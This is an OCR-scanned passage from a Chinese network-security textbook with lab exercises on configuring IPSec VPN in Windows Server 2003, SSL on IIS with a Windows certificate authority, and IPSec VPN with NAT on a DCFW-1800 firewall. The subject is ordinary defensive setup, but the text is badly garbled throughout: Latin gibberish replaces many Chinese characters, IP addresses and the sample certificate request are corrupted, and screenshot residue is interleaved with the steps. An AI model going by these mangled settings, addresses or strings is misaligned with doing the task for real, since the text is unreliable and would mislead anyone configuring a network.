(5) 连接 完成 , 单 击 “ 确 定 ?按钮 ,在 客户 端 上 Ping 服务 端的 IP 地 址 成 功 。 


[ 实 训 8.2 Windows Server 2003 的 IPSec VPN 配置 


A 


【 实 训 目的 】 
配置 VMnetl 和 VMnet3 使 用 IPSec 隧道 方式 进行 加 密 连 接 。 
【 实 训 环境 】 
在 VMware 上 建立 三 个 Hostonly 网 络 ,模拟 两 个 局 域 网 和 三 个 网 段 ,每 个 局 


台 Windows Server 2003 和 


-f Windows XP, 具 体 网 络 拓扑 如 图 8-45 所 示 。 
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【 实 训 内 容 】 
1. 创建 IPSec 策略 (Server A) 


(1) 打开 管理 工具 ,运行 “本 地 安全 策略 ”, 右 击 “IP 安全 策略 ,在 本 地 计算 机 ”项 ,弹出 如 
图 8-46 所 示 的 快捷 菜单 ; 选择 “创建 TP 安全 策略 "命名 为 AB, 取 消 选中 “激活 默认 响应 规 
则 ” 复 选 框 。 编 辑 AB 的 属性 ,添加 新 规则 (不 使 用 添加 向 导 ) 。 


图 8-46 创建 IP 安全 策略 


(2) VJ "TP. 筛选 器 列表 ”, 命 名 为 A to B, 添 加 属性 (不 使 用 添加 向 导 )。 设 置 “ 源 地 址 ” 
为 一 个 特定 的 IP 子 网 ”为 192. 168. 141.0; 目的 地 址 设置 为 “一 个 特定 的 IP T BI" 
192.168. 136.0。 取 消 选 中 “镜像 。 与 源 地 址 和 目标 地 址 正好 相反 的 数据 包 相 匹 配 ”, 如 
8-47 所 示 , 协 议 设 定 为 默认 值 “任意 ”。 


图 8-47 IP 筛选 器 列表 


G) 筛选 器 操作 (不 使 用 添加 向 导 ) :安全 措施 为 “协商 安全 ”, 新 增 安 全 措施 为 “完整 性 
和 加 密 ”, 如 图 8-48 所 示 。 
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8-48 ”筛选 器 操作 


(4) 身份 验证 方法 ,使 用 * 预 共享 密 钥 为 microsoft ,如 图 8-49 所 示 。 


图 8-49 ” 预 共享 密 钥 


(5) 隧道 设置 ,指定 隧道 终点 IP 地 址 ,如 图 8-50 所 示 。 


| 新 规则 Et 


图 8-50 ”隧道 终点 卫 地 址 
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(6) 连接 类 型 为 "所 有 网 络 连接 ”, 如 图 8-51 所 示 。 


图 8-51 连接 类 型 


(7) 重复 步骤 (2)~(6) ,创建 IP 筛选 器 列表 B to A. 
O 在 “本 地 安全 设置 "中 , 右 击 “策略 AB" 项 ,选择 “指派 ”。 


2. 创建 IPSec 策略 (Server B) 
重复 步骤 1, 创 建 Server B 的 IP 安全 策略 并 指派 。 
3. 配置 远程 访问 /VPN 服务 器 


打开 管理 工具 中 分 别 操作 “管理 您 的 服务 器 ”",“ 添 加 删除 角色 ”“ 远 程 访 问 /VPN 服务 
器 ”, 当 Windows Server 2003 配置 成 “路 由 服务 器 ”时 ,才能 作为 客户 端的 默认 网 关 。 


4. Ping 测试 (PC A) 


在 cmd 中 输入 之 ping - t 192. 168. 136. 100,-t 参数 表示 一 直 Ping 下 去 ,直到 按 Ctrl 十 
C 停止。 如 果 两 方 的 IPSec 策略 未 配置 正确 ,不 会 Ping 通 。 注 意 ,如 果 按 本 实验 设置 为 两 
个 网 段 组 成 IPSec 隧道 , 则 不 要 使 用 NAT。 使 用 NAT 意味 着 是 两 个 特定 IP 地 址 ,如 
图 8-52 所 示 。 


5. IP 安全 监视 器 


在 “运行 "对 话 框 中 输入 MMC, 打 开 控 制 台 ; 添加 “IP 安全 监视 器 ”项 ,定位 到 “统计 ”， 
查看 信息 ,如 图 8-53 所 示 。 


6. 网 络 监视 器 


打开 控制 面板 ,做 如 下 操作 :“ 添 加 删除 Windows 组 件 ”,“ 管 理 和 监视 工具 ”“ 详 细 信 
息 "， 网 络 监视 工具 ”, 开 始 ， 网 络 监 视 器 "运行 结果 ,如 图 8-54 所 示 。 


E 


E 


| 
E 


-— i 


网 络 安全 技术 


EE EE 
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图 8-54 网 络 监视 器 
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Gu 8.3 Windows Server 2003 的 SSL VPN 配置 


【 实 训 目的 】 

SSL 是 使 用 公 钥 和 私 钥 技术 组 合 的 安全 网 络 通信 协议 ,可 以 实现 客户 机 和 服务 器 的 双 
向 身份 认证 和 数据 的 机 密 性 。 通 过 正确 配置 并 实现 SSL 协议 在 HIS WWW 服务 器 的 安全 
应 用 ,从 而 理解 密码 技术 在 网 络 安全 系统 构建 中 的 作用 ,分 析 安 全 协议 的 执行 过 程 和 结果 ， 
掌握 SSL VPN 的 配置 方法 。 

【 实 训 环 境 】 

两 台 安装 Windows 操作 系统 的 计算 机 ,其 中 一 台 必 须 安装 Windows Server 2003 或 
2003 服务 器 。 并 且 安 装 证 书 服务 。 

【 实 训 内 容 】 

在 Windows 环境 下 配置 并 实现 SSL 协议 ,包括 用 服务 器 端 和 客户 端 设置 以 及 SSL 测试 。 


1. 设置 SSL 服务 器 端 


COD JEFE" Internet 服务 管理 器 ”命令 ,创建 一 个 名 为 "默认 网 站 ”的 Web 站 点 。 站 点 创 
建 好 以 后 , 右 击 “默认 网 站 ”选项 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ,弹出 如 图 8-55 所 示 
的 对 话 框 。 


图 8-55 设置 默认 网 站 属性 


单 击 * 服 务 器 证 书 ? 按 钮 ,弹出 如 图 8-56 所 示 的 对 话 框 。 

(2) 选择 “新 建 证 书 ” 选 项 , 单 击 * 下 一 步 按 钮 ,出现 如 图 8-57 所 示 的 界面 。 

单 击 “ 下 一 步 ”按钮 ,生成 文件 certreq. txt, 出 现 如 图 8-58 所 示 的 界面 。 

(3) 单 击 * 下 一 步 "按钮 ,生成 一 个 证 书 申请 文件 。 在 浏览 器 上 打开 http: //192. 168. 
0. 55/certsrvC [Eti Web 站 点 的 IP 地 址 为 192. 168. 0. 55) ,将 出 现 申 请 证 书 界 面 ,如 图 8-59 
所 示 。 
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[^ 


以 下 是 为 网 站 分 配 证 书 的 方法 - 


图 8-57 新 建 证 书 
5 E 
证 书 请 求 文件 名 < 
1 和 定 的 文件 名将 证 忆 请 求 保存 为 文本 文件 - 


| 


£x-se[r-sm»] w | 


8-58 生成 文件 certreq. txt 
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AA 


Hicrosoft 证 书 
欢迎 | 
ERIRE DRAN Meb DNE, tps uti mg | 


一 个 证 书 。 通 过 使 用 证 书 ， 您 可 以 向 通过 Web 通信 的 人 确认 您 的 
总 > ips 密 邮 件 ， 并 且 ， 根 据 您 申请 的 证 书 的 类 型， dk 


您 也 可 以 使 用 此 网 站 下 载 证 书 颁发 机 构 CANER, WBE, REB “| 
吊销 列表 (CRL) ， 或 查看 挂 起 的 申请 的 状态 。 | 


有 关 证 书 服务 的 详细 信息 ， 请 参阅 证 书 服务 文档 . | 
选择 一 个 任务 : | 
申请 一 个 证 书 | 
查看 挂 起 的 证 书 申请 的 状态 | 
下 载 一 个 CA 证 书 ， 证 书 链 或 CRL 


图 8-59 申请 证 书 


单 击 “ 申 请 一 个 证 书 ” 按 钮 , 单 击 “ 高 级 申请 ”按钮 ,将 出 现 如 图 8-60 所 示 的 界面 。 


Hicrosoft 证 书 服务 -- hacz 


高 级 证 书 申请 


CA 的 策略 决定 您 可 以 申请 的 证 书 类 别 。 单 击 下 列 选项 之 一 来 : | 
创建 并 向 此 CA 提交 一 个 申请 。 | 


使 用 base64 编码 的 cmc 或 PKCs M10 文件 提交 一 个 证 书 申 || 
$. AEH base64 编码 的 PKCS #7 文件 续 订 证 书 申请 。 | 


回 
C D D N B O E 
图 8-60 高 级 证 书 申请 


(4) 选择 “使 用 base64 编码 的 CMC 或 PKCS# 10 文件 提交 一 个 证 书 申请 ,或 使 用 
base64 编码 的 PKCS 7 文件 续 订 证 书 申请 ”项 ,将 出 现 如 图 8-61 所 示 的 页 面 。 
打开 步骤 (2) 在 C 盘 的 生成 文件 ,全 选 后 复制 ,如 图 8-62 所 示 。 


网 络 安全 技术 


PUEEENWIIEDETTESUTY ë = 
Xie uc ZEV NAW IAV Who | L3 

QsE-O-ju cese cm zjecrro» 

HESE) i««://192. 168.0. 55/ cer ter] cer trat. asp pra dm 
P 


提交 一 个 证 书 申请 或 续 订 申请 
要 提交 一 个 保存 的 申请 到 CA， 在 “保存 的 申请 ” 框 中 粘贴 一 个 


由 外 部 源 ( 如 Web 服务 器 ) 生 成 的 base-64 编码 的 CNC 或 
PKCS #10 证 书 申请 或 PKCS #7 续 订 申请 。 


保存 的 申请 : 


Base-64 编码 的 
证 书 申请 

(CC 或 

PECS $10 或 


PECS 87): x 
x GB 


览 要 插入 的 文件 。 


附加 属性 : 


图 8-61 提交 证 书 申请 


XFO 编辑 如 wo FEV Wb 

--BEGIN NEW CERTIFICATE REQUEST 
MIIDMzCCApuCAQAwWDELMAKGATUEBhMCQO4xDTALBgNUBAgTBGhhY30xCzAJBgNY| 
BAcTAnp6MQ guCuYDYQQKEWRoYWNGHQ OuCuYDUQQLEvRAeGd jHQ8wDQYDUQQDEw2v| 
zhw0DIwgz8wDQYJKozIhucNRQEBBQhRDgYehMIGJhoGBRKBqxrMqel2HnuibDCqy| 
SrP7zfhWHwHUH3rTdBjyzCW7jhUSkdKhhuEPPxguJap9hquBtkeIaBrPdCyUf85 


|huchaQkPBDcwNTR0B9ggqhkiG9uBDhgICRIRuDgYIKozIhuchhwQChgChHhcGBSs0| 
fawIHHAoGCCqGS Ib3DQMHHBHGR1Ud.J)QHHRoGCCSCRQUFBuHBHIH9BgorBgEERY 13| 


DQ ICHYHuMIHrRgEBHLoRTQBpRGHAcgBvRHHRbuBnRHQR IRBSRFHAQQRgRFHAQuEO| 
heERbgBunGURbhhghEMRcgB5RHhhdhBuhGchcgBhhHhhanBphGMAIRBQRHIRbwB82| 
ACKAZABIAHIDJYKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAI 
AAAAAAAAANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAI 


AAANAAAAANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAI 
AAAAADANBgkqhkiGIVABAQUFAAOBJQByzrrNEyBd4313qZAKİYGUJ+WX9MLmCU9q] 
huE+uwPRXOcDKZc+Xguo/hhKB5iJdeFk0pQpnfaNK1c2T3Xufkti19tftRNZnPws| 
za&x IohHJAQUgXo5Sux1p*3qS/uHV JcPFoneSósbUnnDqrDRKFNujaIeDYuuOqK j 


图 8-62 复制 certreq. txt 内 容 


(5) 把 证 书 请 求 文件 粘贴 在 申请 栏 内 ,如 图 8-63 Bron 。 

单 击 “提交 ”按钮 ,证 书 申请 收 到 ,等 待 管 理 员 颁 发 ,如 图 8-64 所 示 。 

(6) 选择 “开始 ”>“ 证 书 颁发 机 构 ” 命 令 , 在 弹出 窗口 的 左 侧 窗 格 中 选择 “ 挂 起 的 申请 ”， 
在 弹出 的 快捷 菜单 中 选择 "所 有 任务 ”> 颁发 ”命令 ,如 图 8-65 所 示 。 

在 申请 证 书 主页 中 , 单 击 “ 查 看 挂 起 的 证 书 申请 的 状态 ”项 ,如 图 8-66 所 示 。 

(7) 单 击 “ 保 存 的 申请 证 书 ” 项 ,如 图 8-67 所 示 。 

选择 “Base 64 编码 ” 单 选 按 钮 , 单 击 “ 下 载 证 书 ” 项 ,如 图 8-68 所 示 。 


Hicrosoft 证 书 服务 


提交 一 个 证 书 申请 或 续 订 申 请 


要 提交 一 个 保存 的 申请 到 CA， 在 “保存 的 申请 “ 框 中 粘贴 一 个 
由 外 部 源 ( 如 Web 服务 器 ) 生 成 的 base-64 编码 的 CRC 或 
PECS $10 证 书 申请 或 PECS #7 续 订 申请 。 


保存 的 申请 : 

[AAAADANBgXqhkiGSwOBAQUE | 
Base-64 ARIDH) |MaEsevwPAXOCDKZc4XOvo/hAKBSiJdOFkODOpnfaN| 
证 书 申请 zaGx IohBJ4QUgXo5Svx1p43qS/vHYJcPFomeS6sb: 
(CNC 或 sbTsrusg0k== 
PKCS #10 或 [-----END NEW CERTIFICATE REQUEST-—- 
PKCS $7: 

浏览 要 插入 的 文件 。 
附加 属性 : 

Rit: 
w 
图 8-63 ”粘贴 certreq. txt 内 容 


fa 证 书 做 发 机 构 
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http://182. 166.0. SS/certsrv/certfnsh. asp 


证 书 挂 起 
您 的 证 书 申请 己 经 收 到 。 但 是 ， 您 必须 等 符 管理 员 颁发 您 申请 
的 证 书 。 


您 的 申请 Id 为 2。 
请 在 一 天 或 两 天 内 返回 此 网 站 以 检索 您 的 证 书 。 
注意 : 名 必须 用 此 veo 浏览 器 在 10 天 内 返回 以 检索 多 的 证 书 


Wim o [TT TT |n —z 
图 8-64 证 书 挂 起 


图 8-65 颁发 证 书 
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使 用 此 网 站 为 您 的 Web ME. 电子 邮件 客户 端 或 其 他 程序 申 

TAE. 通过 使 用 证 书 ， 您 可 以 向 通过 Web 通信 的 人 确认 

身份， 签署 并 加 富 邮 件 ， 并 且 ， 根 据 您 申请 的 证 书 的 类 
S. ACRI E ER. 


| 

| 

| 

| 

| 

| 

ESRB FERRI CUT B, 证 书 链 ， 或 | 
证 书 吊销 列表 (CRL) ， 或 查看 挂 起 的 申请 的 状态 。 | 
| 

| 

| 

| 

| 


有 关 证 书 服务 的 详细 信息 ， 请 参阅 证 书 服务 文档 
选择 一 个 任务 : 
申请 一 个 下 节 


查 的 证 书 申请 的 状态 
下 载 一 个 CA 证 书 ， 证 书 链 或 CRL 


下 
ü TLFFTT9mee 7; 


图 8-66 ”证书 状 态 


查看 挂 起 的 证 书 申请 的 状态 


请 选择 您 要 查看 的 证 书 申请 : 
保存 的 申请 证 书 (2011 年 8 月 26 日 12:50:17) 


Kicrosoft 


证 书 已 颁发 

您 申请 的 证 书 已 颁发 给 您 。 

CDER 编码 或 C Base 64 编码 

下 载 证 书 

下 载 证 书 链 [ 
图 8-68 证 书 下 载 
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(8) 命名 证 书 并 保存 ,如 图 8-69 所 示 。 


图 8-69 证 书 命名 


Ir ij^ Internet 服务 管理 器 "窗口 ,选中 “默认 网 站 属性 ”; 选择 “目录 安全 性 ”选项 卡 , 单 
击 “ 服 务 器 证 书 ”, 选 择 “ 处 理 挂 起 的 请 求 并 安装 证 书 ” 项 ,选择 证 书 文件 要 保存 的 位 置 和 名 
称 ,定义 SSL 端口 为 443 ,完成 安装 ,如 图 8-70 一 图 8-74 所 示 。 


图 8-70 ”服务 器 证 书 


(9) 切记 不 能 忽略 在 服务 器 端 还 要 安装 CA 的 证 书 路 径 。 在 图 8-75 所 示 的 页 面 中 单 击 
“检索 CA 证 书 或 证 书 吊销 列表 ”链接 ,并 选择 安装 此 CA 证 书 路 径 。 

(10). 回 到 “Internet 服务 管理 器 ?窗口 ,设置 默认 站 点 属性 ,其 中 SSL 端口 为 443 ,如 
图 8-76 所 示 。 

如 图 8-76 所 示 , 切 换 至 “目录 安全 性 ”选项 卡 ,打开 “安全 通信 ”和 “编辑 ”对 话 框 , 按 图 8-77 
所 示 进 行 配置 。 
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图 8-71 处 理 挂 起 


[D: WserDataMdnini strator RD cer tnev. cer | i 


图 8-73 SSL 端口 
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NM 


完成 Web 服务 器 证 书 向 导 


已 成 功 完成 Yeb RIBERAS. 
此 服务 器 上 现在 已 安装 了 证 书 。 
如 果 格 来 需要 更 新 、 著 的 或 蝇 除 证 书 ， 可 以 重新 运行 向 导 。 


单 击 “ 完 成 ”按钮 关闭 向 导 。 


LB] ht: //182. 169.0. SS/ certsrv/ certcurc. asp 


下 载 CA 证 书 、 证 书 链 或 CRL 
要 信任 从 这 个 证 书 颁发 机 构 颁 发 的 证 书 ， 安 装 此 CA 证 书 链 。 


要 下 载 一 个 CA 证 书 、 证 书 链 或 CRL， 选 择 证 书 和 编码 方法 。 
Ca 证 书 : 


图 8-76 站 点 属性 
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8-77 安全 通信 配置 


2. 设置 浏览 器 客户 端 


(1) 浏览 器 客户 端 同样 要 到 同一 个 证 书 服务 器 中 申请 证 书 ,如 图 8-78 所 示 , 打 开 申 请 
证 书 主页 , 单 击 “ 申 请 一 个 证 书 ” 项 。 

(2) 选中 “用 户 证 书 申请 ”, 单 击 “"Web 浏览 器 证 书 ” 项 ,如 图 8-79 所 示 。 

填写 需要 的 名 称 ,如 图 8-80 所 示 。 

(3) 等 待 证 书 服务 器 颁发 证 书 ,如 图 8-81 Bron 

(4) 回 到 证 书 服务 器 ,颁发 浏览 器 申请 的 证 书 , 操 作 方 法 同 前 。 返 回 浏览 器 客户 端 ,再 
次 连接 证 书 服务 器 主页 , 单 击 “查看 挂 起 的 证 书 申请 的 状态 ”项 ,如 图 8-82 所 示 。 

保持 默认 设置 , 单 击 "Web 浏览 器 证 书 ” 项 ,如 图 8-83 所 示 。 

(5) 安装 Web 浏览 器 证 书 部 分 完毕 ,返回 ,在 第 (4) 步 第 一 图 所 示 界 面 中 选中 “查看 挂 
起 的 证 书 申请 的 状态 ”, 单 击 " 下 一 步 ” 按 钮 ,打开 如 图 8-84 所 示 的 页 面 。 

单 击 “安装 此 CA 证 书 路 径 ? 超 链接 ,如 图 8-85 所 示 ,CA 证 书 安装 完毕 。 
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Xp RED SED HRW IAV Who Eee 


REE MIE. cx e|O- S - 0A 
EW fE) http://192. 168.0.55/certsrv/ ERE 


为 您 的 Web 浏览 器 ， 电 子 邮件 客户 端 或 其 他 程序 申请 一 个 证 书 。 通 过 
向 通过 Web 通信 的 人 确认 您 的 身份 ， 签 守 并 加 密 邮 件 ， 并 且 ， 
书 的 类 型 ， 执 行 其 他 安全 任务 。 


您 也 可 以 使 用 此 网 站 下 载 证 书 售 发 机 构 (CA) 证 书 ， 证 书 链 ， 或 证 书 吊销 列表 
(CRL)， 或 查看 挂 起 的 申请 的 状态 。 


有 关 证 书 服务 的 详 绍 信 息 ， 请 参阅 证 书 服务 文档 
选择 一 个 任务 : 
申请 一 个 证 书 


查看 挂 起 的 证 书 申请 的 状态 
了 或 一 个 CA 证 书 ， 证 书 链 或 CRL 


加 
而 
图 8-78 浏览 器 端 申请 证 书 


à 书 服务 j 
ZED RAD SFV KAW IAD Ub | & 


om -0-00a ol par ce olo sa 0A 
AEQ) fE) http://192. 168.0.55/certarv/certrqus asp EPEE 


申请 一 个 证 书 


选择 一 个 证 书 类 型: 
MARENE] 
电子 邮件 保护 证 节 


或 者 ， 提 交 一 个 高 级 证 书 申请 。 


图 8-79 申请 证 书 


EID 
文件 四 SAD SEV KEW IAV 8b 
Osr-O-naoipss wm Oea OAV O 


/[182. 168.0.55/certsrv/ certrqbi. asp?type=0 


geb HASEB - 识别 信息 


要 完成 您 的 证 书 ， 在 下 面 的 框 中 输入 要 求 的 信息 。 
姓名 : |shbii 

电子 部件 : [shbli@126.com 
AT: |hacz 
部 门 : xxsd 


[ 8» | 


图 8-80 填写 名 称 


Jicrosoft 证 书 服务 - Wicrosoft Internet Explorer 
Xi) c FEV KEW 工具 四 帮助 中 


QAE -O- QAAR «x e|O- S M - A 


HAED fE) nc: //192 168. 0.55/certsrv/certfnsh. asp 


Kicrosoft 证 书 服务 一 hacz 

证 书 挂 起 

您 的 证 书 申请 已 经 收 到 。 但 是 ， 您 必须 等 符 管 理 员 颁发 您 申请 的 证 书 。 
您 的 申请 Id 为 3。 


请 在 一 天 或 两 天 内 返回 此 网 站 以 检索 您 的 证 书 。 
注意 : 您 必须 用 此 Veb 浏览 器 在 10 天 内 返回 以 检索 您 的 证 书 


图 8-81 证 书 挂 起 


Wicrosoft Internet Explorer 


文件 四 CT ZEV KRW IAV Wbo | & 


om -0-00a olea mr 外 | 口号 国 - 由 说 
WE tee0s/erts ——  — ë gs 


Kicrosoft 证 书 服务 一 hacz 


欢迎 


使 用 此 网 站 为 您 的 Web 浏览 器 ， 电 子 邮件 客户 端 或 其 他 程序 申请 一 个 证 书 。 通 过 
使 用 证 书 ， 您 可 以 向 通过 Web 通信 的 人 确认 您 的 身份 ， 签 署 并 加 密 邮件 ， 并 且 ， 
根据 您 申请 的 证 书 的 类 型 ， 执 行 其 他 安全 任务 。 


您 也 可 以 使 用 此 网 站 下 载 证 书 颁 发 机 构 (CA) 证 书 ， 证 书 链 ， 或 证 书 吊销 列表 
(CRL)， 或 查看 挂 起 的 申请 的 状态 。 


有 关 证 书 服务 的 详细 信息 ， 请 参阅 证 书 服务 文档 , 
选择 一 个 任务 : 
申请 一 个 证 书 


查看 挂 起 的 证 书 申请 的 状态 
下 载 一 个 CA 证 书 ， 证 书 链 或 CRL 


图 8-82 ”证书 状态 


汪 microseft 证 书 服务 - Microsoft Internet Erplorer 
Xi p) FEV KEW IAV Wo 


QsEB-O-Duc|Psk ER olo a- A 6 


Jicrosoft 证 书 | 
查看 挂 起 的 证 书 申请 的 状态 


请 选择 您 要 查看 的 证 书 申请 : 
Web 浏览 器 证 书 〈2011 年 8 月 26 日 13:41:44) 


8-83 ”证书 已 颁发 
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您 申请 的 证 书 已 颁发 给 您 。 


Est 


上 在 的 肚 本 冲突 


AN 


[3 i P x 
92. 169.0. 85/ cer terv/cer trapn. asp 


证 书 已 安装 
您 的 新 证 书 已 经 成 功 安装 。 


图 8-85 安装 完毕 


打开 IE 浏 览 器 “工具”, 选 择 “Internet 选项 "项 ,在 "内容" 选项 卡 中 , 单 击 “ 证 书 ” 按 钮 ， 
打开 “证 书 ” 对 话 框 ,shbli 证 书 保存 在 “个 人 ”选项 卡 中 ,如 图 8-86 所 示 。 


证 书 


8-86 shbli 证 书 保存 位 置 
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(6) 以 http 方式 访问 默认 站 点 ,出 现 如 图 8-87 所 示 的 提示 。 


ID fE) http: //192. 168.0.53/ 


该 页 必须 通过 安全 通道 查看 
您 二 图 沪 问 的 页 面 使 用 安全 套 按 字 层 GU 进行 保护 。 


请 尝试 以 下 操作 : 
e 在 您 要 访问 的 地 址 前 键入 https: ff/ 并 按 Enter. 


NITP 错误 403.4 - 禁止 访问 ; 需要 使 用 SL 查看 该 资源 。 
Internet 信息 服务 (IIS) 


技术 信息 ( 为 技术 支持 人 员 提供 ) 
Microsoft 产品 支 “HTTE” 和 “403” 的 标题 


L LR "IIS 帮助 ”( 可 在 IIS 管理 器 (inetner) 中 访问 ) ,然后 搜索 标题 为 “ 关 
于 安全 ”、“ 安 全 套 接 字 层 (SSL)” 和 “关于 自 定义 错误 消息 ”的 主题 ， 


图 8-87 拒绝 访问 


以 https:// 的 方式 访问 默认 站 点 ,连接 成 功 ,打开 服务 器 的 Web 页 面 ,如 图 8-88 所 示 。 
浏览 器 右 下 角 出 现 一 个 小 锁 。 


[Æ] https://192. 168.0 53/ 


日 建设 中 
烙 想 要 查看 的 站 点 当前 没有 味 认 页 。 可 能 正在 对 它 进行 升级 和 配置 操作 。 


请 稍 后 再 访问 此 站 点 。 如 果 您 仍然 遇 到 问题 ， 请 与 网 站 的 管理 员 联 系 ， 


如 果 您 是 网 站 的 管理 员 ， 并 且 认为 您 是 由 于 错误 才 收 到 此 消息 ， 请 参阅 IIS 
项 助 中 的 “启用 和 茜 用 动态 内 容 “。 


要 访问 IIS 帮助 


1， 单 击 开始 ,然后 单 击 运行 

2， 在 打开 文本 框 中 EA inetagr. HEN IIS 管理 器 。 
3. MERE, BtSENISm. 

4. ÉibInternet FARZ. 


图 8-88 安全 访问 成 功 


打开 * 中 国 建设 银行 ?网 络 银行 网 站 ,浏览 器 右 下 角 出 现 一 个 小 锁 ,如 图 8-89 所 示 。 
(7) 用 SSL 加 密 后 通过 监视 器 捕获 的 加 密 锁 如 图 8-90 所 示 。 
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Qm- O- Nagl e olo a UA 


Bit QD |E) https://ibsbjstar. ccb. com. en/app/Y5/CN/STY1/Login jsp 


迎 使 用 个 人 网 上 银行 


m 二 
x BE B: li sB; 

证 件 号 码 或 用 户 昵称 ， | BPHRUSEESFLHAG “EPR” mà t 
BENER Zi. ER? 


arre ’ WREE ， 请 点 
登录 密码 Lea 0 Hadena 


E rag 


wA 


可 靠 的 SSL(128 位 ) 


图 8-89 银行 网 站 案例 


有 iceresoft AAMAS - DR: 1 (总 结 )] 
PO MAD IFW IAV WAO SOO 帮助 人 0 =lalx| 


zia ls| s EEEa] +t] viel am 34 


4437262. Control Bits: 
LOCAL TCP Control Bits 
A43TEB2... TCP Control Bits: 
4437E62. Control Bits: 


192, 168.0,53 
pc00165 

182. 168.0.53 
182. 168.0.53. 


L 
4437E62. Control Bits 182. 168. 0.53 


E FRANE: Base frane properties 
Elype = Internet IP (IPv4) 


44 3T Eb 21 21 30 44 3T Eb 00 45 00 
00 BA 6E AB 40 00 40 06 49 AA CO AS 00 35 CO AB 
Q0 4A 02 00 00 46 03 
DF 9F 14 41 6 
OF DD FS BC 9D 
T5 FA 3D 45 FF 
FD 24 C4 36 F3 
16 03 00 00 38 8 
ED FAGD4C63 y. k....nLc 
CT TB 41 4B 56 E -x. [AY 
TP 9! Ww n7 An nw ao Th M OP cn an co pn n YO li m d) Y 


Fs 


图 8-90 捕获 SSL 加 密 数据 
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il 8.4 神州 数码 DCFW-1800 系列 IPSec VPN 配置 


【 实 训 目 的 】 

了 解 什么 是 IPSec VPN, 在 什么 环境 下 使 用 ,设置 IPSec VPN 的 目的 是 什么 ; 学 会 如 
何在 神州 数码 防火 墙 上 设置 IPSec VPN. 

【 实 训 环境 】 

(1) IPSec VPN 是 现在 互联 网 上 最 重要 的 网 关 到 网 关 VPN 技术 ,已 经 成 为 企业 分 支 机 
构 间 互联 的 首选 。 总 部 和 分 支 之 前 要 实现 互 访 时 ,就 涉及 此 类 VPN ,或 者 需要 将 数据 包 进 
行 加 密 时 就 涉及 IPSec VPN. 

本 实 训 环境 为 : 防火 墙 设备 2 台 , 局 域 网 交换 机 台 , 网 络 线条 ,PC n 台 。 具 体 网 络 


拓扑 如 图 8-91 所 示 。 
j d 
所 10.0.0.2 20.0.0.2 ⁄ 
f 4] 
y 4 
19216510 192.168.2.0 
医 司 ES 


REH BEH 
192.168.1.1 192.168.2.1 
PC#1 PC#2 


图 8-91 网 络 拓扑 


(2) 防火 墙 FW-A 和 FW-B 都 具有 合法 的 静态 IP 地 址 ,其 中 防火 墙 FW-A 的 内 部 保护 
子 网 为 192. 168. 1. 0/24 ,防火 墙 FW-B 的 内 部 保护 子 网 为 192. 168. 2. 0/24。 要 求 在 FW-A 
5 FW-B 之 间 创 建 IPSec VPN ,使 两 端的 保护 子 网 能 通过 VPN 隧道 互相 访问 。 

【 实 训 内 容 】 


1. 将 防火 墙 外 网 口 添加 到 tunnel 域 中 
CD 打开 防火 墙 管理 界面 , 单 击 * 网 络 -安全 域 ”, 如 图 8-92 所 示 。 


But LAVER2RAYESS » Paewai [d 
12: isea 


图 8-92 外 网 添加 到 隧道 
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(2) 单 击 图 8-92 中 tunnel 对 应 的 修改 按钮 ,打开 tunnel 安全 域 的 修改 界面 ,如 图 8-93 


图 8-93 ”安全 域 tunnel 设置 


G) 单 击 图 8-93 中 的 “新 增 ” 按 钮 ,将 if0 口 添 加 到 tunnel 域 中 ,如 图 8-94 所 示 。 


图 8-94 添加 隧道 域 


2. 添加 VPN 通道 
(1) 定义 预 共享 密 钥 ,如 图 8-95 所 示 , 该 密 钥 必 须 和 防火 墙 定义 的 共享 密 钥 一 致 。 


at Eplerer JJ api 


图 8-95 定义 预 共 享 密 钥 


(2) 新 增 VPN 通道 ,如 图 8-96 所 示 。 
3. 添加 策略 
CD 定义 防火 墙 A 所 连 内 部 网 端 ,通过 IPSec VPN 访问 本 地 内 网 的 规则 ,如 图 8-97 


(2) 定义 本 地 内 网 访问 外 网 ,本 地 内 网 访问 对 端 防火 墙 内 网 的 规则 ,如 图 8-98 所 示 。 
(3) 定义 外 网 用 户 访问 内 网 服务 器 的 规则 ,如 图 8-99 所 示 。 


网 络 


x 


up 
x 
>k. 


BH ZE 本 地 内 网 
h 4 m suena 


ERAR FARAZ ERAZ  MHMN TU 名 注 
I9.M80Q2* — 10112 — 20112 nooo bd 


* muda 
teda: 
* eoo 
* mz 
* 0000 


图 8-96 添加 新 隧道 


源 : 安全 域 选 择 一 tunnel 
目的 : 安全 域 选择 一 trust 
memi: [peer] 服务 选择 相应 的 服务 即 可 
: Des 
* pasa 
T7 Acti eynfiood [84 TCP 服务 有 效 | 
EOP fker[ 仅 对 IC RO] 
I Fastpath 


TY 1800F - Miereseft Internet Explorer 


源 : 安全 域 选择 一 trust 

时 间 限 制 : [Qene] 司 目的 : 安全 域 选择 一 一 untrust 
RERS: [ug 服务 选择 相应 的 服务 即 可 
ARRA: rg 

I artismo [ON TCP 服务 有 效 ] 
Foie (f 109 服务 有 效 ] 
口 pspsh 


图 8-98 添加 防火 墙 A 远程 策略 
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| Ez] 


[063]: trua 


: De 
! pasa 
VE Antioynficod [ 仅 对 TP BEAN] 


源 : 安全 域 选择 一 untrust 

目的 : 安全 域 选 择 一 一 trust 

服务 选择 相应 的 服务 即 可 

E fp 
lj 


Tcv ier (803 rcv 服务 有 效 ] 
D Fastpath 


图 8-99 添加 外 网 用 户 访问 内 网 服务 器 规则 


4. 添加 地 址 转换 规则 


COD 添加 动态 NAT ,将 内 网 网 段 转 换 成 防火 墙 外 网 口 IP 地 址 ,如 图 8-100 所 示 。 


图 8-100 动态 NAT 


192.168. 
防火 墙 外 网 口 IP 地 址 


1.0/24 转 换 成 


D 添加 静态 NAT, 将 内 网 服务 器 IP 转换 成 外 网 合法 地 址 ,如 图 8-101 所 示 。 


图 8-101 静态 NAT 


将 内 网 服务 器 192.168.1.2 转 
换 成 外 网 用 户 可 访问 的 台 法 
IP 地 址 : 10.1.1.5 
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N 


5. 保存 


完成 配置 后 ,保存 .应 用 ,如 图 8-102, [8 8-103 所 示 。 


Wo ULASESEUM 3 


min, S mn, 15 min) 


图 8-103 应 用 配置 


入 侵 检测 系统 


